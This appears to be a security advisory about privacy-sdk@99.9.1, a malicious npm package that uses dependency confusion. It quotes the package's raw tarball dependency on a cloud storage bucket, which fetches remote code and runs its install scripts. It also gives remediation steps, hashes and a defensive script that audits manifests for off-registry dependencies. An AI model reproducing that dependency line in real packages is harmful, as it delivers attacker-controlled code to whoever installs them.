Malicious package

privacy-sdk (npm)

Malicious code in privacy-sdk (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5451
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall privacy-sdk

What this malware does

privacy-sdk@99.9.1 is a hollow wrapper (index.js is module.exports = {}, blank description, blank author) whose sole runtime dependency is declared as a raw tarball URL: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.8.9.tgz". On npm install privacy-sdk, npm fetches that tarball directly from the GCS bucket, bypassing the npm registry's publication, audit, and integrity-hash mechanisms, installs it, and runs any lifecycle scripts (preinstall/install/postinstall) bundled inside. The bucket and depenconf path do not correspond to any identifiable publisher, the URL has no integrity field, and the bytes at that URL are mutable by whoever controls the bucket.

The version 99.9.1 is the canonical high-version dependency-confusion pattern used to outrank an organization's internal privacy-sdk package, and the generic name compounds that risk. The package has no advertised functionality of its own; its only effect on install is to deliver attacker-controlled code into the installer's environment via the smuggled tarball.
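The two things that make this package dangerous, a dependency resolved from a URL outside the registry and a lockfile entry with no integrity hash, are both cheap to check before install. The following is an added example (not O3 Security's code) that audits a parsed package.json and a package-lock.json v2/v3 "packages" map for those conditions; the sample manifest is constructed to mirror the shape described above, and the registry host list is an assumption.

```javascript
// Added example, not O3 Security's code: flag dependencies that, like the
// privacy-sdk wrapper, pull code from outside the npm registry or lack an
// integrity hash. REGISTRY_HOSTS is an assumption; extend it for private mirrors.
const REGISTRY_HOSTS = new Set(['registry.npmjs.org', 'registry.yarnpkg.com']);
const DEP_FIELDS = ['dependencies', 'devDependencies', 'optionalDependencies'];

// Classify one dependency spec; null means "looks like a normal registry range".
function flagSpec(spec) {
  let url = null;
  try { url = new URL(spec); } catch { /* not a URL: semver range, tag, alias */ }
  if (url && /^https?:$/.test(url.protocol)) {
    return REGISTRY_HOSTS.has(url.hostname)
      ? null
      : `remote tarball outside the npm registry (${url.hostname})`;
  }
  if (/^(git(\+\w+)?:|github:|gitlab:|bitbucket:)/.test(spec)) return 'git dependency';
  if (spec.startsWith('file:')) return 'local file dependency';
  return null;
}

// Walk every dependency field of a parsed package.json.
function auditManifest(pkg) {
  const findings = [];
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      const reason = flagSpec(String(spec));
      if (reason) findings.push({ name, spec, reason });
    }
  }
  return findings;
}

// Walk the "packages" map of package-lock.json (lockfileVersion 2/3). An entry
// resolved off-registry, or with no integrity field, cannot be pinned to known bytes.
function auditLock(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (!path || !entry.resolved) continue; // root entry, link, or bundled dep
    const name = path.split('node_modules/').pop();
    let host = null;
    try { host = new URL(entry.resolved).hostname; } catch { /* non-URL resolved */ }
    if (host && !REGISTRY_HOSTS.has(host)) findings.push({ name, reason: `resolved from ${host}` });
    if (!entry.integrity) findings.push({ name, reason: 'no integrity hash' });
  }
  return findings;
}

// Constructed sample manifest; the bucket URL is the one quoted on this page.
const SAMPLE_PKG = { name: 'privacy-sdk', version: '99.9.1', dependencies: {
  ltidisafe: 'https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.8.9.tgz',
  lodash: '^4.17.21' } };
console.log(auditManifest(SAMPLE_PKG)); // one finding, for ltidisafe
```

Run the same checks in CI against the committed lockfile, and pair them with `npm ci --ignore-scripts` so a flagged tarball cannot execute lifecycle scripts before a human looks at it.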

Malicious versions

1 flagged
99.9.1

Indicators of compromise (SHA-256)

3fde8996f6e327af3c05557575254a0ded23e8f31a7b4f5219e1c26615ec3a28
5c92b5d6dae289f8667ca24f2a941473b65e560f6937874f68ff26ed24d58969

Frequently asked questions

No. privacy-sdk on npm has been identified as a malicious package (version 99.9.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005042
IN-MAL-2026-005041

Credits

  • Amazon Inspector · finder

privacy-sdk (npm) malicious package — MAL-2026-5451 | O3 Security